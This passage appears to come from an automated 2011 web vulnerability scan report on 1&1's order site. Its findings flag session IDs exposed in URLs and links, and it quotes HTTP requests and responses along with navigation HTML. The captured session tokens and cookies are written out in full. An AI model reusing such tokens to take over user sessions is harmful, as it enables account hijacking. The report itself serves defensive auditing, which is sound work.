<li><a class="core_button_normal" href="/xml/order/CloudDynamicServer;jsessionid=CC07C007652F99CC9FB631C4D3D45323.TCpfix141a?__frame=_top&amp;linkOrigin=News&amp;linkId=hd.nav.domains" rel="button-hd-nav-domains">
1&amp;1 Dynamic Cloud Server
</a>
...[SNIP]...
<li><a class="core_button_normal" href="/xml/order/VirtualServer;jsessionid=CC07C007652F99CC9FB631C4D3D45323.TCpfix141a?__frame=_top&amp;linkOrigin=News&amp;linkId=hd.nav.mail" rel="button-hd-nav-mail">1&amp;1 Virtual Servers</a>
...[SNIP]...
<li><a class="core_button_normal" href="/xml/order/LocalSubmission;jsessionid=CC07C007652F99CC9FB631C4D3D45323.TCpfix141a?__frame=_top&amp;linkOrigin=News&amp;linkId=hd.nav.listlocal" rel="button-hd-nav-listlocal">ListLocal</a></li><li><a class="core_button_normal" href="/xml/order/Sharepoint;jsessionid=CC07C007652F99CC9FB631C4D3D45323.TCpfix141a?__frame=_top&amp;linkOrigin=News&amp;linkId=hd.nav.sharepoint" rel="button-hd-nav-sharepoint">Microsoft&reg; Sharepoint&reg;</a>
...[SNIP]...
<li><a class="core_button_normal" href="/xml/order/Sharepoint;jsessionid=CC07C007652F99CC9FB631C4D3D45323.TCpfix141a?__frame=_top">Microsoft Sharepoint</a>
...[SNIP]...
<li><a class="core_button_normal" href="/xml/order/Domaininfo;jsessionid=CC07C007652F99CC9FB631C4D3D45323.TCpfix141a?__frame=_top">All About Domains</a>
...[SNIP]...
<li class="first-level"><a class="core_button_normal" href="/xml/order/Service;jsessionid=CC07C007652F99CC9FB631C4D3D45323.TCpfix141a?__frame=_top">Service &amp; Support</a>
...[SNIP]...
<li class="two-rows"><a class="core_button_normal" href="/xml/order/International;jsessionid=CC07C007652F99CC9FB631C4D3D45323.TCpfix141a?__frame=_top">International Customers</a>
...[SNIP]...
<li class="first-item"><a class="core_button_normal" href="/xml/order/NewsIstock;jsessionid=CC07C007652F99CC9FB631C4D3D45323.TCpfix141a?__frame=_top">iStockphoto</a>
...[SNIP]...
<li class="lastItem-NoBorder two-rows"><a class="core_button_normal" href="/xml/order/NewsAwards;jsessionid=CC07C007652F99CC9FB631C4D3D45323.TCpfix141a?__frame=_top">Awards &amp; Recognition</a>
...[SNIP]...
<div class="text"><a rel="height=480, width=665" class="window-open" href="/xml/order/FeatureSite-buildingCnba;jsessionid=CC07C007652F99CC9FB631C4D3D45323.TCpfix141a?__frame=_top"><img src="/oneandone_en_common/img/pages/News/news_cnb.gif" alt="" width="126" height="90">
...[SNIP]...
</p><a rel="height=480, width=665" class="window-open" href="/xml/order/FeatureSite-buildingCnba;jsessionid=CC07C007652F99CC9FB631C4D3D45323.TCpfix141a?__frame=_top">Learn more...</a>
...[SNIP]...
<div class="text"><a class="core_button_normal" href="/xml/order/VirtualServer;jsessionid=CC07C007652F99CC9FB631C4D3D45323.TCpfix141a?__frame=_top"><img src="/oneandone_en_common/img/pages/News/news_vps.jpg" alt="" width="130" height="90">
...[SNIP]...
</p><a class="core_button_normal" href="/xml/order/VirtualServer;jsessionid=CC07C007652F99CC9FB631C4D3D45323.TCpfix141a?__frame=_top">Learn more...</a>
...[SNIP]...
<div class="text"><a rel="height=480, width=665" class="window-open" href="/xml/order/popupSearchAdvertisingOffer;jsessionid=CC07C007652F99CC9FB631C4D3D45323.TCpfix141a?__frame=_top"><img src="/oneandone_en_common/img/pages/News/news_marketingcenter.jpg" alt="" width="129" height="88">
...[SNIP]...
</p><a rel="height=480, width=665" class="window-open" href="/xml/order/popupSearchAdvertisingOffer;jsessionid=CC07C007652F99CC9FB631C4D3D45323.TCpfix141a?__frame=_top">Learn more...</a>
...[SNIP]...
<div class="text"><a class="core_button_normal" href="/xml/order/NewsIstock;jsessionid=CC07C007652F99CC9FB631C4D3D45323.TCpfix141a?__frame=_top"><img src="/oneandone_en_common/img/pages/News/news_istock.gif" alt="" style="float: right; margin-left: 10px;" width="115" height="31">
...[SNIP]...
</p><a class="core_button_normal" href="/xml/order/NewsIstock;jsessionid=CC07C007652F99CC9FB631C4D3D45323.TCpfix141a?__frame=_top">Learn more...</a>
...[SNIP]...
<div class="text"><a rel="height=480, width=665" class="window-open" href="/xml/order/FeatureSite-buildingBlog;jsessionid=CC07C007652F99CC9FB631C4D3D45323.TCpfix141a?__frame=_top"><img src="/oneandone_en_common/img/pages/News/feature_visual_blog.jpg" alt="1&amp;1 Blog" width="129" height="88">
...[SNIP]...
</p><a rel="height=480, width=665" class="window-open" href="/xml/order/FeatureSite-buildingBlog;jsessionid=CC07C007652F99CC9FB631C4D3D45323.TCpfix141a?__frame=_top">Learn more...</a>
...[SNIP]...
<div class="text"><a rel="height=480, width=665" class="window-open" href="/xml/order/FeatureSite-buildingMap;jsessionid=CC07C007652F99CC9FB631C4D3D45323.TCpfix141a?__frame=_top"><img src="/oneandone_en_common/img/pages/News/feature_visual_map.jpg" alt="1&amp;1 Geographic Map" style="float: right; margin-left: 10px;" width="129" height="88">
...[SNIP]...
</p><a rel="height=480, width=665" class="window-open" href="/xml/order/FeatureSite-buildingMap;jsessionid=CC07C007652F99CC9FB631C4D3D45323.TCpfix141a?__frame=_top">Learn more...</a>
...[SNIP]...
<div class="text"><a class="core_button_normal" href="/xml/order/NewsAwards;jsessionid=CC07C007652F99CC9FB631C4D3D45323.TCpfix141a?__frame=_top"><img src="/oneandone_en_common/img/pages/News/news_no1webhost.jpg" alt="No. 1 Web Host" style="float: right; margin-left: 10px;" width="129" height="88">
...[SNIP]...
<br><a class="core_button_normal" href="/xml/order/NewsAwards;jsessionid=CC07C007652F99CC9FB631C4D3D45323.TCpfix141a?__frame=_top">View awards &amp; recognition</a>
...[SNIP]...
<div class="text"><a rel="height=480, width=665" class="window-open" href="/xml/order/popupMsGold;jsessionid=CC07C007652F99CC9FB631C4D3D45323.TCpfix141a?__frame=_top"><img src="/oneandone_en_common/img/pages/News/new_microsoftgold.gif" alt="Microsoft Gold Partner" style="float: right; margin-left: 10px;padding:5px;background:#e9f0fa" width="130" height="63">
...[SNIP]...
</p><a rel="height=480, width=665" class="window-open" href="/xml/order/popupMsGold;jsessionid=CC07C007652F99CC9FB631C4D3D45323.TCpfix141a?__frame=_top">Learn more...</a>
...[SNIP]...
<div class="text"><a rel="height=480, width=665" class="window-open" href="/xml/order/popupSymantec;jsessionid=CC07C007652F99CC9FB631C4D3D45323.TCpfix141a?__frame=_top"><img src="/oneandone_en_common/img/pages/News/new_symantec_freetrial_small.jpg" alt="1&amp;1 Dynamic Content Library" style="float: right; margin-left: 10px;" width="129" height="88">
...[SNIP]...
</p><a rel="height=480, width=665" class="window-open" href="/xml/order/popupSymantec;jsessionid=CC07C007652F99CC9FB631C4D3D45323.TCpfix141a?__frame=_top">Learn more...</a>
...[SNIP]...
<div class="text"><a class="core_button_normal" href="/xml/order/Hosting;jsessionid=CC07C007652F99CC9FB631C4D3D45323.TCpfix141a?__frame=_top"><img src="/oneandone_en_common/img/pages/News/news_enhancedhosting.jpg" alt="" style="float: right; margin-left: 10px;" width="129" height="88">
...[SNIP]...
</p><a class="core_button_normal" href="/xml/order/Hosting;jsessionid=CC07C007652F99CC9FB631C4D3D45323.TCpfix141a?__frame=_top">Learn more...</a>
...[SNIP]...
<div class="text"><a rel="height=480, width=665" class="window-open" href="/xml/order/FeatureSite-buildingWsb;jsessionid=CC07C007652F99CC9FB631C4D3D45323.TCpfix141a?__frame=_top"><img src="/oneandone_en_common/img/pages/News/feature_visual_wsb_new.jpg" alt="" style="float: right; margin-left: 10px;" width="129" height="66">
...[SNIP]...
</p><a rel="height=480, width=665" class="window-open" href="/xml/order/FeatureSite-buildingWsb;jsessionid=CC07C007652F99CC9FB631C4D3D45323.TCpfix141a?__frame=_top">Learn more...</a>
...[SNIP]...
<div class="text"><a rel="height=480, width=665" class="window-open" href="/xml/order/FeatureSite-buildingPhotogallery;jsessionid=CC07C007652F99CC9FB631C4D3D45323.TCpfix141a?__frame=_top"><img src="/oneandone_en_common/img/pages/News/feature_visual_photogallery_new.jpg" alt="1&amp;1 Dynamic Content Library" style="float: right; margin-left: 10px;" width="129" height="66">
...[SNIP]...
</p><a rel="height=480, width=665" class="window-open" href="/xml/order/FeatureSite-buildingPhotogallery;jsessionid=CC07C007652F99CC9FB631C4D3D45323.TCpfix141a?__frame=_top">Learn more...</a>
...[SNIP]...
<li><a class="core_button_normal" href="/xml/order/AboutUs;jsessionid=CC07C007652F99CC9FB631C4D3D45323.TCpfix141a?__frame=_top&amp;linkOrigin=News&amp;linkId=hd.nav.about" rel="button-hd-nav-about">
About 1&amp;1
</a>
...[SNIP]...
<li><a class="core_button_normal" href="/xml/order/Jumpto;jsessionid=CC07C007652F99CC9FB631C4D3D45323.TCpfix141a?__frame=_top&amp;linkId=ft.nav.pressroom&amp;site=ST.PRE.US&amp;origin.page=News&amp;linkOrigin=News&amp;linkId=ft.nav.pressroom" rel="redirectlink-ft-nav-pressroom">
Press Room
</a>
...[SNIP]...
<li><a class="core_button_normal" href="/xml/order/Gtc;jsessionid=CC07C007652F99CC9FB631C4D3D45323.TCpfix141a?__frame=_top&amp;linkOrigin=News&amp;linkId=ft.nav.tandc" rel="button-ft-nav-tandc">
T&amp;C
</a>
...[SNIP]...
<li><a class="core_button_normal" href="/xml/order/PrivacyPolicy;jsessionid=CC07C007652F99CC9FB631C4D3D45323.TCpfix141a?__frame=_top&amp;linkOrigin=News&amp;linkId=ft.nav.privacypolicy" rel="button-ft-nav-privacypolicy">
Privacy Policy
</a>
...[SNIP]...
<li><a rel="height=512, width=683" class="window-open" href="/xml/order/TellAFriend;jsessionid=CC07C007652F99CC9FB631C4D3D45323.TCpfix141a?__frame=_top&amp;linkOrigin=News&amp;linkId=ft.nav.tellafriend&amp;linkType=txt">
Tell a friend
</a>
...[SNIP]...

3.88. http://order.1and1.com/xml/order/News

Summary

Severity:   Medium
Confidence:   Firm
Host:   http://order.1and1.com
Path:   /xml/order/News

Issue detail

The URL in the request appears to contain a session token within the query string:

Request

GET /xml/order/News;jsessionid=CC07C007652F99CC9FB631C4D3D45323.TCpfix141a?__frame=_top HTTP/1.1
Host: order.1and1.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: UT=BZFkpLC06Y2NjXXBmbTNrZTIkLmdaVCxDNjAYHDAwLy0vLSoqLSwmKS0gIiEgHUIwXFFTeDAyLV02YG81KCklJCklIyYkHiYdHCV0dTswN2dwNikqJiUqJyUlJCIgIiU=; __PFIX_TST_=635c29cd52a24c00; emos1und1d1_jcvid=AAABLtO_k24TPu6u_AC8X2ba*4tdkREw:2:AAABLtRSowmWoXKUuK13TmPt9oC0YgfD:1300642308873:0:false:10; backpage=addon; variant.configname=2010-04-14; ucuo=20110320185042-000.TCpfix141a; lastpage=domaincheck; ac-whom-us=OM.US.USa02K18619H7072a; __PFIX_SSC_26b8ec94fefdfb08ca83db66c3c9d4cf=1300643896110_1d32f37376d4f800; variant=QUM6ZGVmYXVsdA==; emos1und1d1_jcsid=AAABLtRSowmWoXKUuK13TmPt9oC0YgfD:41:AAABLtRrQfzB2YvHnChMDPnBS4VYP5WZ:1300643922428; __PFIX_SSC_7e7cde34cee1122e923172c6a51093f7=1300643995381_102591b64f59ec00; __PFIX_SSC_f2c438924f4c8ffc632c427e36641871=1300643999165_6735f29c6c45e400;

Response

HTTP/1.1 200 OK
Date: Sun, 20 Mar 2011 18:38:15 GMT
Server: Apache
Expires: Mon, 05 Jul 1970 05:07:00 GMT
Cache-Control: private
Set-Cookie: UT=AZVoqLS4kZGRkXnFnbjRsZjMlL2hbVS1ENzEZHRoxMC4wLisrLi0nKi4hIyIhHkMxXVJUYjEzLl43YXA2KSomJSomJCclHyceHSZedjwxOGhxNyorJyYrKCUoIyYnICE=; Expires=Fri, 07-Apr-2079 21:52:22 GMT; Path=/
ETag: edde5942d29d19678a705797aa76065e
Vary: Accept-Encoding
Connection: close
Content-Type: text/html;charset=UTF-8
Content-Length: 28632


<!DOCTYPE html
PUBLIC "-//W3C//DTD HTML 4.01//EN" "http://www.w3.org/TR/html4/strict.dtd">
<html lang="en-US"><head>
<meta http-equiv="Content-Type" content="text/html; charset=UTF-8">
<ti
...[SNIP]...

3.89. http://order.1and1.com/xml/order/PrivacyPolicy

Summary

Severity:   Medium
Confidence:   Firm
Host:   http://order.1and1.com
Path:   /xml/order/PrivacyPolicy

Issue detail

The URL in the request appears to contain a session token within the query string:

Request

GET /xml/order/PrivacyPolicy;jsessionid=A9CC7F5386BD5F5ED9C6322067094898.TCpfix140a?__frame=_top&__lf=Static&linkOrigin=Home&linkId=ft.nav.privacypolicy HTTP/1.1
Host: order.1and1.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: UT=BZFkpLC06Y2NjXXBmbTNrZTIkLmdaVCxDNjAYHDAwLy0vLSoqLSwmKS0gIiEgHUIwXFFTeDAyLV02YG81KCklJCklIyYkHiYdHCV0dTswN2dwNikqJiUqJyUlJCIgIiU=; __PFIX_TST_=635c29cd52a24c00; emos1und1d1_jcvid=AAABLtO_k24TPu6u_AC8X2ba*4tdkREw:2:AAABLtRSowmWoXKUuK13TmPt9oC0YgfD:1300642308873:0:false:10; backpage=addon; variant.configname=2010-04-14; ucuo=20110320185042-000.TCpfix141a; lastpage=domaincheck; ac-whom-us=OM.US.USa02K18619H7072a; __PFIX_SSC_26b8ec94fefdfb08ca83db66c3c9d4cf=1300643896110_1d32f37376d4f800; variant=QUM6ZGVmYXVsdA==; emos1und1d1_jcsid=AAABLtRSowmWoXKUuK13TmPt9oC0YgfD:41:AAABLtRrQfzB2YvHnChMDPnBS4VYP5WZ:1300643922428; __PFIX_SSC_7e7cde34cee1122e923172c6a51093f7=1300643995381_102591b64f59ec00; __PFIX_SSC_f2c438924f4c8ffc632c427e36641871=1300643999165_6735f29c6c45e400;

Response

HTTP/1.1 301 Moved Permanently
Date: Sun, 20 Mar 2011 18:36:33 GMT
Server: Apache
Expires: Mon, 26 Jul 1997 05:00:00 GMT
Pragma: no-cache
Cache-Control: no-cache, no-store, private, must-revalidate
Location: http://order.1and1.com/xml/order/PrivacyPolicy?__frame=_top&__lf=Static&linkOrigin=Home&linkId=ft.nav.privacypolicy
Content-Length: 0
Connection: close
Content-Type: text/plain


3.90. http://order.1and1.com/xml/order/Server

Summary

Severity:   Medium
Confidence:   Firm
Host:   http://order.1and1.com
Path:   /xml/order/Server

Issue detail

The URL in the request appears to contain a session token within the query string:

Request

GET /xml/order/Server;jsessionid=CC07C007652F99CC9FB631C4D3D45323.TCpfix141a?__frame=_top&linkOrigin=Hosting&linkId=hd.nav.server HTTP/1.1
Host: order.1and1.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: UT=BZFkpLC06Y2NjXXBmbTNrZTIkLmdaVCxDNjAYHDAwLy0vLSoqLSwmKS0gIiEgHUIwXFFTeDAyLV02YG81KCklJCklIyYkHiYdHCV0dTswN2dwNikqJiUqJyUlJCIgIiU=; __PFIX_TST_=635c29cd52a24c00; emos1und1d1_jcvid=AAABLtO_k24TPu6u_AC8X2ba*4tdkREw:2:AAABLtRSowmWoXKUuK13TmPt9oC0YgfD:1300642308873:0:false:10; backpage=addon; variant.configname=2010-04-14; ucuo=20110320185042-000.TCpfix141a; lastpage=domaincheck; ac-whom-us=OM.US.USa02K18619H7072a; __PFIX_SSC_26b8ec94fefdfb08ca83db66c3c9d4cf=1300643896110_1d32f37376d4f800; variant=QUM6ZGVmYXVsdA==; emos1und1d1_jcsid=AAABLtRSowmWoXKUuK13TmPt9oC0YgfD:41:AAABLtRrQfzB2YvHnChMDPnBS4VYP5WZ:1300643922428; __PFIX_SSC_7e7cde34cee1122e923172c6a51093f7=1300643995381_102591b64f59ec00; __PFIX_SSC_f2c438924f4c8ffc632c427e36641871=1300643999165_6735f29c6c45e400;

Response

HTTP/1.1 200 OK
Date: Sun, 20 Mar 2011 18:33:35 GMT
Server: Apache
Expires: Mon, 05 Jul 1970 05:07:00 GMT
Cache-Control: private
Set-Cookie: UT=vZ1wsLzAmT09mYHNpcDZuaDUnMWpdVy9GOTMbHxwcGzAyMC0tMC8pLDAjJSQjIEUzX1RWZBweMGA5Y3I4KywoJywoJiknISkgHyhgYSczOmpzOSwtKSgtKicqJSgpIiM=; Expires=Fri, 07-Apr-2079 21:47:42 GMT; Path=/
ETag: 1e80e3a593b677388759f6eb9a792645
Vary: Accept-Encoding
Connection: close
Content-Type: text/html;charset=UTF-8
Content-Length: 20244


<!DOCTYPE html
PUBLIC "-//W3C//DTD HTML 4.01//EN" "http://www.w3.org/TR/html4/strict.dtd">
<html lang="en-US"><head>
<meta http-equiv="Content-Type" content="text/html; charset=UTF-8">
<ti
...[SNIP]...

3.91. http://order.1and1.com/xml/order/Server

Summary

Severity:   Medium
Confidence:   Firm
Host:   http://order.1and1.com
Path:   /xml/order/Server

Issue detail

The response contains the following links that appear to contain session tokens:

Request

GET /xml/order/Server;jsessionid=CC07C007652F99CC9FB631C4D3D45323.TCpfix141a?__frame=_top&linkOrigin=Hosting&linkId=hd.nav.server HTTP/1.1
Host: order.1and1.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: UT=BZFkpLC06Y2NjXXBmbTNrZTIkLmdaVCxDNjAYHDAwLy0vLSoqLSwmKS0gIiEgHUIwXFFTeDAyLV02YG81KCklJCklIyYkHiYdHCV0dTswN2dwNikqJiUqJyUlJCIgIiU=; __PFIX_TST_=635c29cd52a24c00; emos1und1d1_jcvid=AAABLtO_k24TPu6u_AC8X2ba*4tdkREw:2:AAABLtRSowmWoXKUuK13TmPt9oC0YgfD:1300642308873:0:false:10; backpage=addon; variant.configname=2010-04-14; ucuo=20110320185042-000.TCpfix141a; lastpage=domaincheck; ac-whom-us=OM.US.USa02K18619H7072a; __PFIX_SSC_26b8ec94fefdfb08ca83db66c3c9d4cf=1300643896110_1d32f37376d4f800; variant=QUM6ZGVmYXVsdA==; emos1und1d1_jcsid=AAABLtRSowmWoXKUuK13TmPt9oC0YgfD:41:AAABLtRrQfzB2YvHnChMDPnBS4VYP5WZ:1300643922428; __PFIX_SSC_7e7cde34cee1122e923172c6a51093f7=1300643995381_102591b64f59ec00; __PFIX_SSC_f2c438924f4c8ffc632c427e36641871=1300643999165_6735f29c6c45e400;

Response

HTTP/1.1 200 OK
Date: Sun, 20 Mar 2011 18:33:35 GMT
Server: Apache
Expires: Mon, 05 Jul 1970 05:07:00 GMT
Cache-Control: private
Set-Cookie: UT=vZ1wsLzAmT09mYHNpcDZuaDUnMWpdVy9GOTMbHxwcGzAyMC0tMC8pLDAjJSQjIEUzX1RWZBweMGA5Y3I4KywoJywoJiknISkgHyhgYSczOmpzOSwtKSgtKicqJSgpIiM=; Expires=Fri, 07-Apr-2079 21:47:42 GMT; Path=/
ETag: 1e80e3a593b677388759f6eb9a792645
Vary: Accept-Encoding
Connection: close
Content-Type: text/html;charset=UTF-8
Content-Length: 20244


<!DOCTYPE html
PUBLIC "-//W3C//DTD HTML 4.01//EN" "http://www.w3.org/TR/html4/strict.dtd">
<html lang="en-US"><head>
<meta http-equiv="Content-Type" content="text/html; charset=UTF-8">
<ti
...[SNIP]...
<div id="header"><a class="core_button_normal" href="/xml/order/Jumpto;jsessionid=CC07C007652F99CC9FB631C4D3D45323.TCpfix141a?__frame=_top&amp;linkId=hd.log.eue&amp;site=PU.WH.US&amp;origin.page=Server&amp;linkOrigin=Server&amp;linkId=hd.log.eue" rel="redirectlink-hd-log-eue"><img alt="1&amp;1 Internet AG" id="header_logo" src="/modules/frontend-skin-odin/img/frontend-skin-odin/header/logo_1and1.png" class="alphapng">
...[SNIP]...
<li class="dropdown left first_item"><a class="core_button_normal" href="/xml/order/Home;jsessionid=CC07C007652F99CC9FB631C4D3D45323.TCpfix141a?__frame=_top&amp;linkOrigin=Server&amp;linkId=hd.nav.home" rel="button-hd-nav-home">Home</a></li><li class="dropdown left"><a class="core_button_normal" href="/xml/order/Instant;jsessionid=CC07C007652F99CC9FB631C4D3D45323.TCpfix141a?__frame=_top&amp;linkOrigin=Server&amp;linkId=hd.nav.domains" rel="button-hd-nav-domains">Domains</a>
...[SNIP]...
<li><a class="core_button_normal" href="/xml/order/Instant;jsessionid=CC07C007652F99CC9FB631C4D3D45323.TCpfix141a?__frame=_top&amp;linkOrigin=Server&amp;linkId=hd.nav.domainSearch" rel="button-hd-nav-domainSearch">Domain Search</a>
...[SNIP]...
<li><a class="core_button_normal" href="/xml/order/DomaininfoMove;jsessionid=CC07C007652F99CC9FB631C4D3D45323.TCpfix141a?__frame=_top&amp;linkOrigin=Server&amp;linkId=hd.nav.domainTransfer" rel="button-hd-nav-domainTransfer">Domain Transfer</a>
...[SNIP]...
<li class="dropdown left"><a class="core_button_normal" href="/xml/order/Mail;jsessionid=CC07C007652F99CC9FB631C4D3D45323.TCpfix141a?__frame=_top&amp;linkOrigin=Server&amp;linkId=hd.nav.mail" rel="button-hd-nav-mail">Mail</a>
...[SNIP]...
<li><a class="core_button_normal" href="/xml/order/MailInstantMail;jsessionid=CC07C007652F99CC9FB631C4D3D45323.TCpfix141a?__frame=_top&amp;linkOrigin=Server&amp;linkId=hd.nav.domains" rel="button-hd-nav-domains">Instant Mail</a>
...[SNIP]...
<li><a class="core_button_normal" href="/xml/order/MailXchange;jsessionid=CC07C007652F99CC9FB631C4D3D45323.TCpfix141a?__frame=_top&amp;linkOrigin=Server&amp;linkId=hd.nav.ecommerce" rel="button-hd-nav-ecommerce">1&amp;1 MailXchange</a>
...[SNIP]...
<li><a class="core_button_normal" href="/xml/order/MicrosoftExchange;jsessionid=CC07C007652F99CC9FB631C4D3D45323.TCpfix141a?__frame=_top&amp;linkOrigin=Server&amp;linkId=hd.nav.mail" rel="button-hd-nav-mail">Microsoft&reg; Exchange</a>
...[SNIP]...
<li><a class="core_button_normal" href="/xml/order/Hosting;jsessionid=CC07C007652F99CC9FB631C4D3D45323.TCpfix141a?__frame=_top&amp;linkOrigin=Server&amp;linkId=hd.nav.domains" rel="button-hd-nav-domains">Linux Hosting</a>
...[SNIP]...
<li><a class="core_button_normal" href="/xml/order/MsHosting;jsessionid=CC07C007652F99CC9FB631C4D3D45323.TCpfix141a?__frame=_top&amp;linkOrigin=Server&amp;linkId=hd.nav.mail" rel="button-hd-nav-mail">Microsoft Hosting</a>
...[SNIP]...
<li><a class="core_button_normal" href="/xml/order/Jumpto;jsessionid=CC07C007652F99CC9FB631C4D3D45323.TCpfix141a?__frame=_top&amp;linkId=ngh&amp;site=PU.NGH.US&amp;origin.page=Server&amp;page=switch&amp;linkOrigin=Server&amp;linkId=ngh" rel="redirectlink-ngh">
MyBusiness Site
</a>
...[SNIP]...
<li class="dropdown left"><a class="core_button_normal" href="/xml/order/Eshops;jsessionid=CC07C007652F99CC9FB631C4D3D45323.TCpfix141a?__frame=_top&amp;linkOrigin=Server&amp;linkId=hd.nav.ecommerce" rel="button-hd-nav-ecommerce">eCommerce</a></li><li class="dropdown left"><a class="core_button_normal" href="/xml/order/Server;jsessionid=CC07C007652F99CC9FB631C4D3D45323.TCpfix141a?__frame=_top&amp;linkOrigin=Server&amp;linkId=hd.nav.server">Servers</a>
...[SNIP]...
<li><a class="core_button_normal" href="/xml/order/ServerPremium;jsessionid=CC07C007652F99CC9FB631C4D3D45323.TCpfix141a?__frame=_top&amp;linkOrigin=Server&amp;linkId=hd.nav.domains" rel="button-hd-nav-domains">1&amp;1 Dedicated Servers</a>
...[SNIP]...
<li><a class="core_button_normal" href="/xml/order/CloudDynamicServer;jsessionid=CC07C007652F99CC9FB631C4D3D45323.TCpfix141a?__frame=_top&amp;linkOrigin=Server&amp;linkId=hd.nav.domains" rel="button-hd-nav-domains">
1&amp;1 Dynamic Cloud Server
</a>
...[SNIP]...
<li><a class="core_button_normal" href="/xml/order/VirtualServer;jsessionid=CC07C007652F99CC9FB631C4D3D45323.TCpfix141a?__frame=_top&amp;linkOrigin=Server&amp;linkId=hd.nav.mail" rel="button-hd-nav-mail">1&amp;1 Virtual Servers</a>
...[SNIP]...
<li><a class="core_button_normal" href="/xml/order/LocalSubmission;jsessionid=CC07C007652F99CC9FB631C4D3D45323.TCpfix141a?__frame=_top&amp;linkOrigin=Server&amp;linkId=hd.nav.listlocal" rel="button-hd-nav-listlocal">ListLocal</a></li><li><a class="core_button_normal" href="/xml/order/Sharepoint;jsessionid=CC07C007652F99CC9FB631C4D3D45323.TCpfix141a?__frame=_top&amp;linkOrigin=Server&amp;linkId=hd.nav.sharepoint" rel="button-hd-nav-sharepoint">Microsoft&reg; Sharepoint&reg;</a>
...[SNIP]...
<li><a class="core_button_normal" href="/xml/order/VirtualServer;jsessionid=CC07C007652F99CC9FB631C4D3D45323.TCpfix141a?__frame=_top&amp;linkOrigin=Server&amp;linkId=hd.tab.vps" rel="button-hd-tab-vps"><span>
...[SNIP]...
<li><a class="core_button_normal" href="/xml/order/CloudDynamicServer;jsessionid=CC07C007652F99CC9FB631C4D3D45323.TCpfix141a?__frame=_top&amp;linkOrigin=Server&amp;linkId=hd.tab.cds" rel="button-hd-tab-cds"><span>
...[SNIP]...
<li><a class="core_button_normal" href="/xml/order/ServerPremium;jsessionid=CC07C007652F99CC9FB631C4D3D45323.TCpfix141a?__frame=_top&amp;linkOrigin=Server&amp;linkId=hd.tab.serverpremium" rel="button-hd-tab-serverpremium"><span>
...[SNIP]...
<li style="float:right;"><a class="auswahl" href="/xml/order/costs;jsessionid=CC07C007652F99CC9FB631C4D3D45323.TCpfix141a?__frame=_top&amp;linkOrigin=Server&amp;linkId=hd.tab.yourcart" rel="button-hd-tab-yourcart" title="Ihre Auswahl im &Uuml;berblick (Warenkorb)"><span>
...[SNIP]...
</span><a class="btn btn-yellow-large btn-pos" href="/xml/order/ServerPremium;jsessionid=CC07C007652F99CC9FB631C4D3D45323.TCpfix141a?__frame=_top&amp;linkOrigin=Server&amp;linkId=weiter" rel="button-weiter"><span>
...[SNIP]...
</ul><a class="btn btn-blue-large btn-pos" href="/xml/order/CloudDynamicServer;jsessionid=CC07C007652F99CC9FB631C4D3D45323.TCpfix141a?__frame=_top&amp;linkOrigin=Server&amp;linkId=weiter" rel="button-weiter"><span>
...[SNIP]...
</ul><a class="btn btn-blue-large btn-pos" href="/xml/order/VirtualServer;jsessionid=CC07C007652F99CC9FB631C4D3D45323.TCpfix141a?__frame=_top&amp;linkOrigin=Server&amp;linkId=weiter" rel="button-weiter"><span>
...[SNIP]...
<br><a class="core_button_normal" href="/xml/order/TcSpecialOffers;jsessionid=CC07C007652F99CC9FB631C4D3D45323.TCpfix141a?__frame=_top">Click here</a>
...[SNIP]...
<li><a class="core_button_normal" href="/xml/order/AboutUs;jsessionid=CC07C007652F99CC9FB631C4D3D45323.TCpfix141a?__frame=_top&amp;linkOrigin=Server&amp;linkId=hd.nav.about" rel="button-hd-nav-about">
About 1&amp;1
</a>
...[SNIP]...
<li><a class="core_button_normal" href="/xml/order/Jumpto;jsessionid=CC07C007652F99CC9FB631C4D3D45323.TCpfix141a?__frame=_top&amp;linkId=ft.nav.pressroom&amp;site=ST.PRE.US&amp;origin.page=Server&amp;linkOrigin=Server&amp;linkId=ft.nav.pressroom" rel="redirectlink-ft-nav-pressroom">
Press Room
</a>
...[SNIP]...
<li><a class="core_button_normal" href="/xml/order/Gtc;jsessionid=CC07C007652F99CC9FB631C4D3D45323.TCpfix141a?__frame=_top&amp;linkOrigin=Server&amp;linkId=ft.nav.tandc" rel="button-ft-nav-tandc">
T&amp;C
</a>
...[SNIP]...
<li><a class="core_button_normal" href="/xml/order/PrivacyPolicy;jsessionid=CC07C007652F99CC9FB631C4D3D45323.TCpfix141a?__frame=_top&amp;linkOrigin=Server&amp;linkId=ft.nav.privacypolicy" rel="button-ft-nav-privacypolicy">
Privacy Policy
</a>
...[SNIP]...
<li><a rel="height=512, width=683" class="window-open" href="/xml/order/TellAFriend;jsessionid=CC07C007652F99CC9FB631C4D3D45323.TCpfix141a?__frame=_top&amp;linkOrigin=Server&amp;linkId=ft.nav.tellafriend&amp;linkType=txt">
Tell a friend
</a>
...[SNIP]...

3.92. http://order.1and1.com/xml/order/ServerPremium

Summary

Severity:   Medium
Confidence:   Firm
Host:   http://order.1and1.com
Path:   /xml/order/ServerPremium

Issue detail

The URL in the request appears to contain a session token within the query string:

Request

GET /xml/order/ServerPremium;jsessionid=A9CC7F5386BD5F5ED9C6322067094898.TCpfix140a?__frame=_top&__lf=Static HTTP/1.1
Host: order.1and1.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
